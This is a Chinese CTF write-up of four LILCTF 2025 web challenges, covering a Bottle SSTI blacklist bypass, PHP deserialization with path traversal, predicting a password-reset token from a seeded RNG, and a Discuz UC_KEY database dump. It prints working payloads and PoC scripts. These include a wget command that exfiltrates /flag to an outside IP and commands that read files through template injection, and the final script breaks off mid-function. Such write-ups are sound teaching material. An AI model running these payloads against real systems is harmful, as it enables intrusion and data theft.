2025LILCTF
本文最后更新于 20 天前,其中的信息可能已经有所发展或是发生改变。

WEB

ez_bottle

给出附件:

from bottle import route, run, template, post, request, static_file, error
import os
import zipfile
import hashlib
import time

# hint: flag in /flag , have a try

UPLOAD_DIR = os.path.join(os.path.dirname(__file__), 'uploads')
os.makedirs(UPLOAD_DIR, exist_ok=True)

STATIC_DIR = os.path.join(os.path.dirname(__file__), 'static')
MAX_FILE_SIZE = 1 * 1024 * 1024

BLACK_DICT = ["{", "}", "os", "eval", "exec", "sock", "<", ">", "bul", "class", "?", ":", "bash", "_", "globals",
              "get", "open"]

def contains_blacklist(content):
    """Return True when *content* contains any substring listed in BLACK_DICT."""
    for banned in BLACK_DICT:
        if banned in content:
            return True
    return False

def is_symlink(zipinfo):
    """Return True when the entry's mode bits (external_attr >> 16) have file type 0o120000."""
    mode_bits = zipinfo.external_attr >> 16
    # Mask down to the file-type field before comparing.
    file_type = mode_bits & 0o170000
    return file_type == 0o120000

def is_safe_path(base_dir, target_path):
    """Return True when *target_path* resolves to *base_dir* or a location inside it.

    Both paths are resolved with ``os.path.realpath`` first. The comparison is
    done on whole path components, so a sibling directory that merely shares a
    name prefix with *base_dir* (``/srv/up`` vs ``/srv/up_evil``) is rejected.
    """
    base_real = os.path.realpath(base_dir)
    target_real = os.path.realpath(target_path)
    try:
        return os.path.commonpath([base_real, target_real]) == base_real
    except ValueError:
        # commonpath() raises when the paths cannot be compared
        # (e.g. different drives on Windows); treat that as unsafe.
        return False

@route('/')
def index():
    """Serve ``index.html`` from STATIC_DIR for the site root."""
    return static_file('index.html', root=STATIC_DIR)

@route('/static/<filename>')
def server_static(filename):
    """Serve the requested *filename* from STATIC_DIR."""
    return static_file(filename, root=STATIC_DIR)

@route('/upload')
def upload_page():
    """Serve ``upload.html`` from STATIC_DIR (the GET side of /upload)."""
    return static_file('upload.html', root=STATIC_DIR)

@post('/upload')
def upload():
    """Accept a ZIP upload, extract it into a fresh directory and list its contents.

    Every rejection path returns a plain-text message. On success the response
    lists the extracted names and the ``/view/<md5>/<file>`` path of the first one.
    """
    zip_file = request.files.get('file')
    if not zip_file or not zip_file.filename.endswith('.zip'):
        return 'Invalid file. Please upload a ZIP file.'

    # The whole stream is read just to measure it; it is rewound right after.
    if len(zip_file.file.read()) > MAX_FILE_SIZE:
        return 'File size exceeds 1MB. Please upload a smaller ZIP file.'

    zip_file.file.seek(0)

    # Extraction directory name = md5(filename + current timestamp).
    current_time = str(time.time())
    unique_string = zip_file.filename + current_time
    md5_hash = hashlib.md5(unique_string.encode()).hexdigest()
    extract_dir = os.path.join(UPLOAD_DIR, md5_hash)
    os.makedirs(extract_dir)

    zip_path = os.path.join(extract_dir, 'upload.zip')
    zip_file.save(zip_path)

    try:
        with zipfile.ZipFile(zip_path, 'r') as z:
            # Validate every entry first; extraction only happens if all pass.
            for file_info in z.infolist():
                if is_symlink(file_info):
                    return 'Symbolic links are not allowed.'

                real_dest_path = os.path.realpath(os.path.join(extract_dir, file_info.filename))
                if not is_safe_path(extract_dir, real_dest_path):
                    return 'Path traversal detected.'

            z.extractall(extract_dir)
    except zipfile.BadZipFile:
        return 'Invalid ZIP file.'

    # List what was extracted, hiding the saved archive itself.
    files = os.listdir(extract_dir)
    files.remove('upload.zip')

    return template("文件列表: {{files}}\n访问: /view/{{md5}}/{{first_file}}",
                    files=", ".join(files), md5=md5_hash, first_file=files[0] if files else "nofile")

@route('/view/<md5>/<filename>')
def view_file(md5, filename):
    """Read ``UPLOAD_DIR/<md5>/<filename>`` and render its content as a template.

    Returns a plain-text message when the file is missing, when the content
    hits the blacklist, or when rendering raises.
    """
    file_path = os.path.join(UPLOAD_DIR, md5, filename)
    if not os.path.exists(file_path):
        return "File not found."

    with open(file_path, 'r', encoding='utf-8') as f:
        content = f.read()

    # Substring blacklist is the only filter applied before rendering.
    if contains_blacklist(content):
        return "you are hacker!!!nonono!!!"

    try:
        # NOTE(review): the uploaded file content itself is used as the
        # template source here; this is the sink the write-up targets.
        return template(content)
    except Exception as e:
        return f"Error rendering template: {str(e)}"

@error(404)
def error404(error):
    """Return the fixed body used for 404 responses."""
    return "bbbbbboooottle"

@error(403)
def error403(error):
    """Return the fixed body used for 403 responses."""
    return "Forbidden: You don't have permission to access this resource."

# Start the server on all interfaces, port 5000, with debug disabled, when run as a script.
if __name__ == '__main__':
    run(host='0.0.0.0', port=5000, debug=False)

主要用到的是两个路由:/upload 和 /view

/upload路由没有直接的上传入口,本地起一个就好:

<!doctype html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <title>上传 ZIP 到 challenge</title>
  <style>
    body { font-family: Arial, sans-serif; padding:20px; }
    .box { max-width:600px; margin:auto; }
  </style>
</head>
<body>
  <div class="box">
    <h2>上传 ZIP 文件</h2>
    <form action="http://challenge.xinshi.fun:45318/upload" method="post" enctype="multipart/form-data">
      <label for="file">选择 ZIP 文件(.zip,≤1MB):</label><br>
      <input type="file" id="file" name="file" accept=".zip" required><br><br>
      <button type="submit">上传</button>
    </form>
    <p>上传后页面会显示服务器响应,其中可能包含访问 `/view/&lt;md5&gt;/&lt;filename&gt;` 的链接。</p>
  </div>
</body>
</html>

上传好文件会转到url/upload,并给出/view/<md5>/文件名

看了下waf的名单,过滤了一些ssti常用的函数,但是这里是bottle框架,斜体字变形后可绕过这些函数的限制,主要麻烦在于{}被过滤了,不好像平时那样构造ssti语句,但是用% 也可以来执行语句。

bottle斜体绕过:https://www.cnblogs.com/LAMENTXU/articles/18805019

尝试外带,发现不行,应该是不出网。

但是也不太好写文件(?反正我写出来有些困难),于是先发一个包,创建了一个/<md5>/文件名的路径,然后再将文件写入已有路径。

发现直接读取文件会回显hacker!,于是base64编码一下就能顺利拿出来了。

Payload:


% import 𝑜𝓈
% 𝑜𝓈.system('cat /flag | base64 |tee ./uploads/71a4f58fd00b711514d6d7f87a054afd/b.tpl')

解码后拿到flag:LILCTF{6o77Le_H@S_8EEn_reCYc13D}

Your Uns3r

源码:

<?php
highlight_file(__FILE__);
class User
{
    public $username; // loosely compared with "admin" in __destruct()
    public $value; // serialized string that exec() unserializes
    public function exec() // reached only from __destruct() below
    {
        $ser = unserialize(serialize(unserialize($this->value))); // round-trip $this->value through unserialize/serialize/unserialize
        if ($ser != $this->value && $ser instanceof Access) { // result must be an Access instance and differ (loosely) from the raw value
            include($ser->getToken()); // include the path built by Access::getToken()
        }
    }
    public function __destruct() // runs when the object is destroyed
    {
        if ($this->username == "admin") { // loose comparison
            $this->exec();
        }
    }
}

class Access
{
    protected $prefix; // text placed before the fixed 'lilctf' segment
    protected $suffix; // text placed after the fixed 'lilctf' segment

    public function getToken() // returns prefix . 'lilctf' . suffix, or throws
    {
        if (!is_string($this->prefix) || !is_string($this->suffix)) { // both parts must be strings
            throw new Exception("Go to HELL!");
        }
        $result = $this->prefix . 'lilctf' . $this->suffix;
        if (strpos($result, 'pearcmd') !== false) { // reject any result containing 'pearcmd'
            throw new Exception("Can I have peachcmd?");
        }
        return $result;

    }
}

$ser = $_POST["user"]; // raw serialized payload from the POST body
if (strpos($ser, 'admin') !== false && strpos($ser, 'Access":') !== false) { // blocked only when BOTH substrings are present
    exit ("no way!!!!");
}

$user = unserialize($ser);
throw new Exception("nonono!!!"); // thrown unconditionally right after unserialize()

同时发现页面上抛出了一个错误,这个错误来源于throw new Exception("nonono!!!");

Fatal error: Uncaught exception 'Exception' with message 'nonono!!!' in /var/www/html/index.php:47 Stack trace: #0 {main} thrown in /var/www/html/index.php on line 47

这个反序列化链子并不复杂,两个类 User 和 Access:User 的 username 必须为 "admin";Access 对象传入前缀和后缀($prefix 和 $suffix),然后经过过滤和拼接,再放进 include($ser->getToken()); 中。

主要有几个点:绕过字符串检测(admin 和 Access": 不能同时存在);字符串拼接($this->prefix . 'lilctf' . $this->suffix);垃圾回收机制(throw new Exception("nonono!!!");)。

绕过字符串检测,这里我绕的是admin,反序列化里大写S可以识别十六进制,所以只需要把s:5:"admin"换成S:5:"\61\64\6d\69\6e"即可。

字符串拼接会导致字符中间必然出现一个lilctf,考虑直接目录穿越穿出去,即:/lilctf/../../../../flag->/flag

最后是这个垃圾回收机制的绕过,当对象为NULL时也是可以触发__destruct的。

在一个 array 里面存在一个键值对,value 为某个类,当这个类为 NULL 的时候,会被认为是 is_ref 为 0,也就是 false,这就可以触发到 __destruct 方法。

晨曦师傅刚好就有博客总结了:

https://chenxi9981.github.io/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96

写个php生成一下payload,由于Access内存在protected属性,不太好赋值(我太菜了),所以这里直接手动构造了

<?php
// Stub declarations mirroring the challenge's class shapes. The payload below
// is assembled by hand as a string, so these are not instantiated.
class Access {
    protected $prefix;
    protected $suffix;
}

class User {
    public $username;
    public $value;
}

// Hand-build the serialized Access object. Protected property names are
// encoded as "\0*\0name", which is why each name has length 9.
$prefix = "/";
$suffix = "/../../../../flag";
$accessSerialized = 'O:6:"Access":2:{';
$accessSerialized .= 's:9:"' . "\0" . '*' . "\0" . 'prefix";s:' . strlen($prefix) . ':"' . $prefix . '";';
$accessSerialized .= 's:9:"' . "\0" . '*' . "\0" . 'suffix";s:' . strlen($suffix) . ':"' . $suffix . '";';
$accessSerialized .= '}';

// Build the User object; the username uses the hex-escaped "S:" string form
// so the literal substring "admin" never appears in the payload.
$userSerialized  = 'O:4:"User":2:{';
$userSerialized .= 's:8:"username";S:5:"\61\64\6d\69\6e";'; 
$userSerialized .= 's:5:"value";s:' . strlen($accessSerialized) . ':"' . $accessSerialized . '";';
$userSerialized .= '}';

// Garbage-collection trick: an array with the same key twice, where the
// second entry (N;) replaces the User object.
$key = "user";
$payload  = 'a:2:{';
$payload .= 's:' . strlen($key) . ':"' . $key . '";' . $userSerialized;
$payload .= 's:' . strlen($key) . ':"' . $key . '";N;';
$payload .= '}';

// Print the raw and URL-encoded forms on separate lines; without a separator
// the two outputs run together and cannot be told apart.
echo $payload . PHP_EOL;
echo urlencode($payload) . PHP_EOL;

Payload:

POST:
user=a%3A2%3A%7Bs%3A4%3A%22user%22%3BO%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3BS%3A5%3A%22%5C61%5C64%5C6d%5C69%5C6e%22%3Bs%3A5%3A%22value%22%3Bs%3A82%3A%22O%3A6%3A%22Access%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00prefix%22%3Bs%3A1%3A%22%2F%22%3Bs%3A9%3A%22%00%2A%00suffix%22%3Bs%3A17%3A%22%2F..%2F..%2F..%2F..%2Fflag%22%3B%7D%22%3B%7Ds%3A4%3A%22user%22%3BN%3B%7D

拿到flag:LILCTF{90Nn@_fIND_Your_4nSweR_t#_un53r}

Ekko_note

给出源码:

# -*- encoding: utf-8 -*-
'''
@File    :   app.py
@Time    :   2066/07/05 19:20:29
@Author  :   Ekko exec inc. 某牛马程序员 
'''
import os
import time
import uuid
import requests

from functools import wraps
from datetime import datetime
from secrets import token_urlsafe
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, render_template, redirect, url_for, request, flash, session

# Timestamp taken once at import time; also used as the RNG seed below.
SERVER_START_TIME = time.time()

# (Author's note, translated) Oops, these two test-only lines were never removed. It's already
# shipped, so never mind; we're all just trying to get through the day.
# Nothing in this program uses the random library anyway, so it should be fine.
import random
random.seed(SERVER_START_TIME)

# Random admin password generated at startup.
admin_super_strong_password = token_urlsafe()
app = Flask(__name__)
app.config['SECRET_KEY'] = 'your-secret-key-here'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False

db = SQLAlchemy(app)

class User(db.Model):
    """Account record: credentials, admin flag and a per-user time API URL."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(20), unique=True, nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)
    # Holds the value produced by generate_password_hash().
    password = db.Column(db.String(60), nullable=False)
    is_admin = db.Column(db.Boolean, default=False)
    # URL queried by check_time_api(); editable via /admin/settings.
    time_api = db.Column(db.String(200), default='https://api.uuni.cn//api/time')

class PasswordResetToken(db.Model):
    """Password reset token issued for a user; flagged once it has been used."""
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    # String form of the UUID generated in forgot_password().
    token = db.Column(db.String(36), unique=True, nullable=False)
    used = db.Column(db.Boolean, default=False)

def padding(input_string):
    """Return the first 6 UTF-8 bytes of *input_string*, NUL-padded on the right, as a big-endian int."""
    raw = input_string.encode('utf-8')[:6]
    # Right-pad with NUL bytes so the value is always exactly 6 bytes wide.
    raw += b'\x00' * (6 - len(raw))
    return int.from_bytes(raw, 'big')

# Create the tables and, if no 'admin' user exists yet, insert one with the
# random startup password.
with app.app_context():
    db.create_all()
    if not User.query.filter_by(username='admin').first():
        admin = User(
            username='admin',
            email='admin@example.com',
            password=generate_password_hash(admin_super_strong_password),
            is_admin=True
        )
        db.session.add(admin)
        db.session.commit()

def login_required(f):
    """Decorator: redirect to the login page unless the session carries a ``user_id``."""
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('请登录', 'danger')
            return redirect(url_for('login'))
        return f(*args, **kwargs)
    return decorated_function

def admin_required(f):
    """Decorator: require a logged-in session whose user row has ``is_admin`` set."""
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('请登录', 'danger')
            return redirect(url_for('login'))
        # The admin flag is re-read from the database rather than the session.
        # NOTE(review): no None check on `user` before `.is_admin` is read.
        user = User.query.get(session['user_id'])
        if not user.is_admin:
            flash('你不是admin', 'danger')
            return redirect(url_for('home'))
        return f(*args, **kwargs)
    return decorated_function

def check_time_api():
    """Query the current user's ``time_api`` URL and report whether its year is >= 2066.

    Returns the boolean result of the year comparison, or None when the
    request/parsing raises or the JSON body has no truthy ``date`` field.
    """
    user = User.query.get(session['user_id'])
    try:
        # The URL comes from the user's row (see /admin/settings).
        response = requests.get(user.time_api)
        data = response.json()
        datetime_str = data.get('date')
        if datetime_str:
            print(datetime_str)
            current_time = datetime.fromisoformat(datetime_str)
            return current_time.year >= 2066
    except Exception as e:
        # Any failure is reported to the caller as None.
        return None
    return None
@app.route('/')
def home():
    """Render the home page."""
    return render_template('home.html')

@app.route('/server_info')
@login_required
def server_info():
    """Return the server start timestamp and the current timestamp to any logged-in user."""
    return {
        # Same value that was passed to random.seed() at startup.
        'server_start_time': SERVER_START_TIME,
        'current_time': time.time()
    }
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Show the registration form (GET) or create a new non-admin user (POST)."""
    if request.method == 'POST':
        username = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        confirm_password = request.form.get('confirm_password')

        if password != confirm_password:
            flash('密码错误', 'danger')
            return redirect(url_for('register'))

        # Reject duplicate usernames and duplicate e-mail addresses.
        existing_user = User.query.filter_by(username=username).first()
        if existing_user:
            flash('已经存在这个用户了', 'danger')
            return redirect(url_for('register'))

        existing_email = User.query.filter_by(email=email).first()
        if existing_email:
            flash('这个邮箱已经被注册了', 'danger')
            return redirect(url_for('register'))

        hashed_password = generate_password_hash(password)
        new_user = User(username=username, email=email, password=hashed_password)
        db.session.add(new_user)
        db.session.commit()

        flash('注册成功,请登录', 'success')
        return redirect(url_for('login'))

    return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    """Show the login form (GET) or verify credentials and populate the session (POST)."""
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')

        user = User.query.filter_by(username=username).first()
        if user and check_password_hash(user.password, password):
            # Session keys set on successful login.
            session['user_id'] = user.id
            session['username'] = user.username
            session['is_admin'] = user.is_admin
            flash('登陆成功,欢迎!', 'success')
            return redirect(url_for('dashboard'))
        else:
            flash('用户名或密码错误!', 'danger')
            return redirect(url_for('login'))

    return render_template('login.html')

@app.route('/logout')
@login_required
def logout():
    """Clear the session and redirect to the home page."""
    session.clear()
    flash('成功登出', 'info')
    return redirect(url_for('home'))

@app.route('/dashboard')
@login_required
def dashboard():
    """Render the dashboard for a logged-in user."""
    return render_template('dashboard.html')

@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
    """Show the form (GET) or create and store a reset token for the given e-mail (POST).

    The token is only stored; nothing in this handler sends it anywhere.
    """
    if request.method == 'POST':
        email = request.form.get('email')
        user = User.query.filter_by(email=email).first()
        if user:
            # (Author's note, translated) Which UUID version to pick... what a headache >_<
            # Let's go with UUID v8, it looks like the newest version
            token = str(uuid.uuid8(a=padding(user.username))) # (translated) oh, custom arguments are allowed; put the username in then
            reset_token = PasswordResetToken(user_id=user.id, token=token)
            db.session.add(reset_token)
            db.session.commit()
            # TODO: write an SMTP service to actually send the token out
            flash(f'密码恢复token已经发送,请检查你的邮箱', 'info')
            return redirect(url_for('reset_password'))
        else:
            flash('没有找到该邮箱对应的注册账户', 'danger')
            return redirect(url_for('forgot_password'))

    return render_template('forgot_password.html')

@app.route('/reset_password', methods=['GET', 'POST'])
def reset_password():
    """Show the form (GET) or set a new password for the owner of an unused token (POST)."""
    if request.method == 'POST':
        token = request.form.get('token')
        new_password = request.form.get('new_password')
        confirm_password = request.form.get('confirm_password')

        if new_password != confirm_password:
            flash('密码不匹配', 'danger')
            return redirect(url_for('reset_password'))

        # Only tokens not yet marked as used are accepted.
        reset_token = PasswordResetToken.query.filter_by(token=token, used=False).first()
        if reset_token:
            user = User.query.get(reset_token.user_id)
            user.password = generate_password_hash(new_password)
            reset_token.used = True
            db.session.commit()
            flash('成功重置密码!请重新登录', 'success')
            return redirect(url_for('login'))
        else:
            flash('无效或过期的token', 'danger')
            return redirect(url_for('reset_password'))

    return render_template('reset_password.html')

@app.route('/execute_command', methods=['GET', 'POST'])
@login_required
def execute_command():
    """Run a submitted shell command once check_time_api() reports a year >= 2066.

    The command's output is not returned; a POST only redirects back to this page.
    """
    result = check_time_api()
    if result is None:
        flash("API死了啦,都你害的啦。", "danger")
        return redirect(url_for('dashboard'))

    if not result:
        flash('2066年才完工哈,你可以穿越到2066年看看', 'danger')
        return redirect(url_for('dashboard'))

    if request.method == 'POST':
        command = request.form.get('command')
        os.system(command) # (translated) What? Security? Look, I told you it's not finished yet, stop rushing me.
        return redirect(url_for('execute_command'))

    return render_template('execute_command.html')

@app.route('/admin/settings', methods=['GET', 'POST'])
@admin_required
def admin_settings():
    """Show (GET) or overwrite (POST) the current admin user's ``time_api`` URL."""
    user = User.query.get(session['user_id'])
    
    if request.method == 'POST':
        # The submitted value is stored as-is.
        new_api = request.form.get('time_api')
        user.time_api = new_api
        db.session.commit()
        flash('成功更新API!', 'success')
        return redirect(url_for('admin_settings'))

    return render_template('admin_settings.html', time_api=user.time_api)

# Run the Flask server on all interfaces with debug disabled when executed as a script.
if __name__ == '__main__':
    app.run(debug=False, host="0.0.0.0")

这里注释有提示:

# 欸我艹这两行代码测试用的忘记删了,欸算了都发布了,我们都在用力地活着,跟我的下班说去吧。
# 反正整个程序没有一个地方用到random库。应该没有什么问题。
import random
random.seed(SERVER_START_TIME)

# 选哪个UUID版本好呢,好头疼 >_<
            # UUID v8吧,看起来版本比较新
            token = str(uuid.uuid8(a=padding(user.username))) # 可以自定义参数吗原来,那把username放进去吧
            reset_token = PasswordResetToken(user_id=user.id, token=token)
            db.session.add(reset_token)
            db.session.commit()
            # TODO:写一个SMTP服务把token发出去

这里使用了 uuid.uuid8() 来生成密码重置 token。

根据 Python 的官方文档,uuid.uuid8() 的参数是可选的。如果某些参数没有被提供,uuid 模块会使用 random 模块的函数来生成随机数来填充这些缺失的部分。也就是说还是用到了导入的random库。

@app.route('/server_info')
@login_required
def server_info():
    """Return the server start timestamp and the current timestamp to any logged-in user."""
    return {
        # The start time is exposed verbatim in the response.
        'server_start_time': SERVER_START_TIME,
        'current_time': time.time()
    }

注意到这个/server_info路由,会回显服务器的启动时间。

SERVER_START_TIME 初始化了 random 模块的种子

uuid.uuid8(a=None, b=None, c=None)

a: 一个 48 位的整数。
b: 一个 16 位的整数。
c: 一个 64 位的整数。

a是固定的,b、c是random生成的,由于我们拿到了服务器的启动时间,相当于拿到了seed,也就能伪随机拿到生成的值。

让GPT帮我们改一下,做出预测token的脚本:

import random
import uuid

def padding(input_string):
    """Return the first 6 UTF-8 bytes of *input_string*, NUL-padded, as a big-endian int.

    This must stay identical to the ``padding`` function on the server,
    otherwise the predicted token will not match.
    """
    byte_string = input_string.encode('utf-8')
    if len(byte_string) > 6:
        byte_string = byte_string[:6]
    # Right-pad with NUL bytes to exactly 6 bytes (48 bits).
    padded_byte_string = byte_string.ljust(6, b'\x00')
    padded_int = int.from_bytes(padded_byte_string, byteorder='big')
    return padded_int

# 1. Server start time as returned by the /server_info endpoint
server_start_time = 1755245225.1615558

# 2. Seed the random module with exactly the same value the server used
random.seed(server_start_time)

# 3. Reproduce the server's token generation for the 'admin' user
admin_username = 'admin'
padded_admin_username = padding(admin_username)

# 4. Call uuid.uuid8().
# NOTE(review): presumably this only matches the server if it is the first
# random draw after seeding on both sides — confirm no earlier token was issued.
predicted_token = str(uuid.uuid8(a=padded_admin_username))

print("-" * 30)
print(f"为 'admin' 用户预测的密码重置 Token 是:")
print(predicted_token)
print("-" * 30)

跑脚本得到重置密码的token,拿着去重置一下密码,邮箱就在源码里,为:admin@example.com

改密码登上admin,发现两个路由/execute_command(显示要2066年才开放)、/admin/settings(可以改时间的api),很明显需要伪造一个假的时间api来欺骗服务器,使其开放执行命令的功能

让GPT写一个,放到vps上开着就行:

from flask import Flask, jsonify

app = Flask(__name__)

@app.route('/time')
def fake_time():
    """Return a fixed JSON body whose ``date`` field is an ISO timestamp in the year 2066."""
    return jsonify({
        "date": "2066-01-01T00:00:00+00:00"
    })

# Listen on all interfaces, port 8000, when run as a script.
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000)

然后就能进到/execute_command了,但rce无回显,这里考虑直接外带到vps上了,试了curl不太行,那就换成wget,读根目录时发现换行和空格会直接截断,导致后面的不显示了,于是base64编码一下。

Payload:

wget "http://1.94.60.237:8000?data=$(cat /flag | base64 -w 0)"

base64的-w 0参数:意思是取消自动换行(wrap)不然输出不完整

解码得到flag:LILCTF{U_h@v3_f0und_7H3_rl6hT_tlmELlNe!}

我曾经有一个工作

先做信息收集 发现是Discuz x3.5

逛了一圈没发现有明显的越权之类的点,考虑是复现历史cve,找cve的过程中似乎没什么特别符合这个场景的,但是题目描述:flag 在 pre_a_flag 表里,考虑存在sql注入或者任意文件读取(dump数据库)

Windows下Discuz x3.4的两种攻击思路:https://www.moonsec.com/2940.html

找到一些资料(?好像不咋有用),顺着他复现过程中的文件,让ai搜一搜几个泄漏点在我们的备份文件中是否存在

/api/source/config/config_ucenter.php发现泄露了UC_KEY,资料里面getshell之类的操作都是需要UC_KEY的,所以我们现在先判断一下UC_KEY能不能摸到后端。

让GPT帮忙写一个POC来验证一下UC_KEY能否摸到后端,那就奖励他写

GPT给出验证UC_KEY的POC(大体是向/api/uc.php发一个简单的xml,查看返回是否为“1”,判断是否被接收)

如果出问题,将文件名改为

import time
import argparse
import requests
from urllib.parse import urlencode

# Sends action=updateclient with benign settings payload
# This writes to uc_client/data/cache/settings.php on the server if accepted

def poc(base_url: str, uc_key: str, timeout: float = 30):
    """Send a signed ``action=updateclient`` request to ``/api/uc.php``.

    Args:
        base_url: Site root, with or without a trailing slash.
        uc_key: UC_KEY used to sign the ``code`` query parameter.
        timeout: Seconds to wait for the server before giving up, so an
            unresponsive target cannot hang the script indefinitely.

    Returns:
        ``(status_code, first 200 characters of the body, final request URL)``.
    """
    params = {
        'action': 'updateclient',
        'time': int(time.time())
    }
    # NOTE(review): build_uc_code is not defined in this listing; it has to be
    # supplied alongside this script.
    code = build_uc_code(params, uc_key)
    url = f"{base_url.rstrip('/')}/api/uc.php"
    # Minimal XML payload expected by xml_unserialize -> dict
    xml = (
        "<?xml version='1.0' encoding='utf-8'?>"
        "<root><setting><foo>bar</foo></setting></root>"
    )
    resp = requests.post(
        url,
        params={'code': code},
        data=xml.encode('utf-8'),
        headers={'Content-Type': 'application/xml'},
        timeout=timeout,
    )
    return (resp.status_code, resp.text[:200], resp.url)

def main():
    """Parse ``--base``/``--key``, run the PoC once and print whether the server answered ``1``."""
    parser = argparse.ArgumentParser(description='Discuz UC api/uc.php UC_KEY PoC (action=updateclient)')
    parser.add_argument('--base', required=True, help='Base URL of Discuz site, e.g. http://127.0.0.1')
    parser.add_argument('--key', required=True, help='UC_KEY from config/config_ucenter.php')
    opts = parser.parse_args()

    status, snippet, final_url = poc(opts.base, opts.key)
    report = (
        ('[+] Request URL:', final_url),
        ('[+] HTTP', status),
        ('[+] Body:', repr(snippet)),
    )
    for label, value in report:
        print(label, value)

    # Success means HTTP 200 with a body of exactly "1" (ignoring whitespace).
    accepted = status == 200 and snippet.strip() == '1'
    if not accepted:
        print('[-] FAIL or not vulnerable (status/body not matched)')
        return
    print('[+] SUCCESS: Server accepted updateclient; settings cache likely written')

# Run the PoC only when executed as a script.
if __name__ == '__main__':
    main()

可以看到返回了“1”,就是说这个用来验证漏洞的xml成功写入了,也就是说UC_KEY被验证可用了,可以写入东西到缓存中

那就想直接任意文件读取是否可行,读取数据库,找一下pre_a_flag 表,让GPT5辅助我们一步步改一下poc(本来想着伪造admin先进后台的,但是发现好像能直接读取文件导出文件):

利用UC_KEY去触发api/db/dbbak.php,让服务器导出sql库

让AI帮我们改进脚本,进一步搜索pre_a_flag表中flag字段

得到POC:

import re
import time
import argparse
import hashlib
import base64
import requests
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

"""
PoC: Use UC_KEY to drive api/db/dbbak.php (apptype=discuzx) export flow,
follow nexturl chain, download SQL parts, and extract pre_a_flag rows.

This script is self-contained and does not import uc_poc to avoid import issues.
"""

def _rc4(data: bytes, key: bytes) -> bytes:
    s = list(range(256))
    j = 0
    out = bytearray()
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    for ch in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        k = s[(s[i] + s[j]) & 0xFF]
        out.append(ch ^ k)
    return bytes(out)

def authcode(string: str, operation: str, key: str, expiry: int = 3600) -> str:
    ckey_length = 4
    key = hashlib.md5(key.encode()).hexdigest()
    keya = hashlib.md5(key[0:16].encode()).hexdigest()
    keyb = hashlib.md5(key[16:32].encode()).hexdigest()
    if operation == 'DECODE':
        keyc = string[:ckey_length]
    else:
        keyc = hashlib.md5(str(time.time()).encode()).hexdigest()[-ckey_length:]
    cryptkey = (keya + hashlib.md5((keya + keyc).encode()).hexdigest()).encode()

    if operation == 'DECODE':
        string = base64.b64decode(string[ckey_length:] + '==').decode(errors='ignore')
    else:
        expiry_time = int(time.time()) + expiry if expiry else 0
        string = f"{expiry_time:010d}" + hashlib.md5((string + keyb).encode()).hexdigest()[0:16] + string
    result = _rc4(string.encode(), cryptkey)

    if operation == 'DECODE':
        try:
            result_str = result.decode(errors='ignore')
        except Exception:
            return ''
        if (result_str[:10] == '0' or int(result_str[:10]) > int(time.time())) and \
           result_str[10:26] == hashlib.md5((result_str[26:] + keyb).encode()).hexdigest()[0:16]:
            return result_str[26:]
        return ''
    else:
        encoded = base64.b64encode(result).decode().replace('=', '')
        return keyc + encoded

def build_uc_code(params: dict, uc_key: str) -> str:
    """URL-encode *params* and wrap them in an ``authcode`` token valid for one hour."""
    return authcode(urlencode(params), 'ENCODE', uc_key, expiry=3600)

def http_get(url, *, params=None, timeout=60, retries=3):
    """GET *url*, retrying on request errors with a growing pause between attempts.

    Args:
        url: Target URL.
        params: Optional query parameters.
        timeout: Per-request timeout in seconds.
        retries: Total number of attempts; values below 1 are treated as 1.

    Returns:
        The successful response object.

    Raises:
        requests.exceptions.RequestException: the error from the final attempt.
    """
    attempts = max(1, retries)
    for attempt in range(1, attempts + 1):
        try:
            r = requests.get(url, params=params, timeout=timeout)
            r.raise_for_status()
            return r
        except requests.exceptions.RequestException:
            if attempt == attempts:
                # No point sleeping after the last attempt; surface the error now.
                raise
            time.sleep(2 * attempt)

def call_db_api(base_url: str, uc_key: str, params: dict):
    """Call ``/api/db/dbbak.php`` with *params* signed by *uc_key*; return ``(body text, final URL)``."""
    signed_params = dict(params)
    # A fresh timestamp is always set, overriding any caller-supplied 'time'.
    signed_params['time'] = int(time.time())
    endpoint = f"{base_url.rstrip('/')}/api/db/dbbak.php"
    query = {'apptype': 'discuzx', 'code': build_uc_code(signed_params, uc_key)}
    response = http_get(endpoint, params=query, timeout=90, retries=3)
    return response.text, response.url

def parse_xml_for_next_and_file(xml_text: str):
    """Extract ``(errorCode, errorMessage, nexturl, file_url)`` from an XML reply.

    Unparseable XML yields ``(None, 'parse_error', None, None)``. A missing
    ``<error>`` element yields code ``None`` and message ``''``.
    """
    try:
        doc = ET.fromstring(xml_text)
    except ET.ParseError:
        return None, 'parse_error', None, None

    def _stripped_text(node):
        # Element text with surrounding whitespace removed, or None if absent/empty.
        if node is not None and node.text:
            return node.text.strip()
        return None

    error_el = doc.find('error')
    if error_el is None:
        code, msg = None, ''
    else:
        code, msg = error_el.get('errorCode'), error_el.get('errorMessage')

    info_el = doc.find('fileinfo')
    file_url = _stripped_text(info_el.find('file_url')) if info_el is not None else None
    nexturl = _stripped_text(doc.find('nexturl'))
    return code, msg, nexturl, file_url

def list_backups(base_url: str, uc_key: str):
    """Call ``method=list`` and return the last path component of every ``<dir>/<dirname>`` entry."""
    response_text, _ = call_db_api(base_url, uc_key, {'method': 'list'})
    try:
